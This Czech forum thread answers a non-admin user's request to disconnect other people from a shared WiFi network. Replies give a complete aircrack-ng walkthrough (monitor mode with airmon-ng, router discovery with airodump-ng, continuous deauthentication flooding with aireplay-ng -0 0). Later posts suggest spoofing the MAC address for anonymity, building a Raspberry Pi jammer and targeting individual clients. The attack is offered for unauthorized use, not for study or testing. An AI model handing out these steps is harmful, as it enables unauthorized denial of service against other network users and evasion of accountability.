Diskuze: Věci kolem WiFi
Člen
Zobrazeno 24 zpráv z 24.
//= Settings::TRACKING_CODE_B ?> //= Settings::TRACKING_CODE ?>
Kdyžtak mě můžete klidně odkázat na tutoriály v angličtině.
Podstrkávání DNS asi nebude řešení, protože pořád na WiFi budou
Odpojit je neni problém, stačí na to 3 příkazy a ani neni třeba bejt moc chytrej. Zkus zagooglit. Až se dostanu domu, tak napíšu jak.
Ahoj, já jsem googlit zkoušel, ale asi nehledám správně.
Mimochodem já nejsem admin sítě (to jsi snad poznal) a když jsem šel v
prohlížeči na adresu routeru, tak tam neměli nastavený defaultní
heslo.
Předem díky moc
Heslo nepotřebuješ. Nic nepotřebuješ. Stačí ti jenom počítač s
Linuxem a Wi-Fi adaptérem. Nainstaluješ balíček aircrack-ng (v Kali
by už měl být nainstalovaný).
Při tomhle ani nemusíš bejt připojenej k routeru, odpojit ostatní lidi aby
si měl volno neni hlavní podstata tohohle příkazu.
Nejdřív si vypíšeš síťové karty příkazem
ifconfig
Mezi nimi bude i wlanX, kde X je číslo karty, nejčastěji bejvá
wlan0, pokud k notebooku připojíš usb adaptér tak bude jako wlan1.
Teď už musíš jako superuser
sudo -s
Příkazem airmon-ng přepneš kartu
airmon-ng start wlanX
něco to vypíše, ale tebe bude zajímat jenom poslední řádek, něco jako
monitor mode enabled on monX
kde monX je virtuální síťová karta. Vždycky se začíná od nuly,
takže pokud od minula žádnou nemáš, tak to bude mon0
Potom si zjistíš MAC routeru, od kterého budeš odpojovat. Nejlépe
použít
airodump-ng monX
Vypíše se první řádek s informacemi a dvě tabulky. První je tabulka
WiFi vysílačů - zajímá tě poslední sloupček s ESSID (jméno wifi) a
první s BSSID (MAC adresa). MAC si označ a přes Ctrl+Shift+C kopíruj, potom
přes Ctrl+C airodump vypni, objeví se zase možnost psát příkazy.
A teď začneš odpojovat. Na to je příkaz aireplay-ng.
aireplay-ng -0 0 -a MA:C0:0R:OU:TE:RU -e "ESSID Routeru" monX
Pokud to začne vypisovat hromadu sending deauth to..., tak se
povedlo. Až budeš chtít, tak to přes Ctrl+C vypneš. Neni to naprosto
dokonalý, neodpojí to všechny najednou a někteří se během toho můžou na
chvilku připojit, pak je to zase odpojí (možná). Každopádně mě se daří
během odpojování ostatních zůstávat připojenej.
Potom zase vypneš monX
airmon-ng stop monX
Při dalším pokusu už to bude kratší, stačí si to pamatovat
airmon-ng start wlanX
aireplay-ng -0 0 -a MAC -e "ESSID" monX
airmon-ng stop monX
jak se proti tomu dá bránit? Windows alternativa? Je to anonymní?
Teoreticky je to anonymní, protože v rámci Kali jde i fingovat MAC adresa.
Klidně můžeš posílat deauth token z 00:00:00:00:00 adresy.
Myslím, že ve Windows to jde taky, v rámci Cygwinu.
Pokud vim, tak bránit se tomu nedá. Už si to moc nepamatuju, ale myslí,
že počítač se tváří jako odpojující se zařízení a router nepozná
rozdíl, tak ho odpojí.
Čistě teoreticky, a jenom pokud se nepletu, by se tomu dalo bránit pokud
upravíš celej WiFi protokol tak, aby neexistovalo nic jako odpojení...
Změna MAC neni jen v rámci Kali, teoreticky to jde všude.
pak lze, ale na tom principu postavit jednoduchou rušičku Wi-Fi. Prostě nějaké destička s linuxem bude v cyklu pravidelně volat tady toto co odpojí všechny klienty. A když se tomu nedá bránit....
Něco podobného jsem měl postavené na raspberry a fungovalo to v pohodě A bránit se tomu nedá
no právě, to bylo první co mě napadlo.
A podle mě to už i existuje. Navíc je to (myslím) legální rušička, vpodstatě nevysílá žádný signál který by blokoval jiný, jen se odpojuje.
Dají se do toho přidat výjimky IP adres, na které DeAuth nebude působit?
Ne. Maximálně zjistit MAC zarizeni, ktere neodpojovat a pak spustit nekolik prikazu, kazdej na jedno pripojeny zarizeni s dalsim parametrem, jejich MAC (ted nevim jakej to je parametr, ale myslim ze b nebo h, kdyz das aireplay-ng --help, tak ti to rekne kterej je co). Jejich seznam je ta druha tabulka v Airodumpu, prvni MAC je zarizeni, druha pripojenej router
Ne. Maximálně zjistit MAC zarizeni, ktere neodpojovat a pak spustit nekolik prikazu, kazdej na jedno pripojeny zarizeni s dalsim parametrem, jejich MAC (ted nevim jakej to je parametr, ale myslim ze b nebo h, kdyz das aireplay-ng --help, tak ti to rekne kterej je co). Jejich seznam je ta druha tabulka v Airodumpu, prvni MAC je zarizeni, druha pripojenej router
Jj na to stačí jednoduchý python scrypt, který bude příjmat blacklist/whitelist, bssid, tvojí mac a a volat aireplay ng příkazy
Btw. je to parametr -c http://www.aircrack-ng.org/doku.php?…
Říkal jsem že si to už moc nepamatuju, aireplay-ng má asi 6 paramterů brající MAC, které jsou každý pro jiný případ. Napsat jednoduchý skript není problém, několik věcí už mám takhle připravených, proto to taky tolik zapomínam
Kde ses to naučil? Materiály jsem našel jen v knize Black Hat Python, jenže mě to nebaví z důvodů že to není C/C++ nebo podobně, python se mi učit nechce, nelíbí se mi.
Nevim, prostě sem se to někde naučil A python je pěkný jazyk.
Jestli se python někomu líbí, ať si v něm programuje ja to nezakazuju spíš naopak. Ale mě se nelíbí
A nevěděl bys o nějaké alternativě pro C#? Zní to zajímavě a užitečně
Zobrazeno 24 zpráv z 24.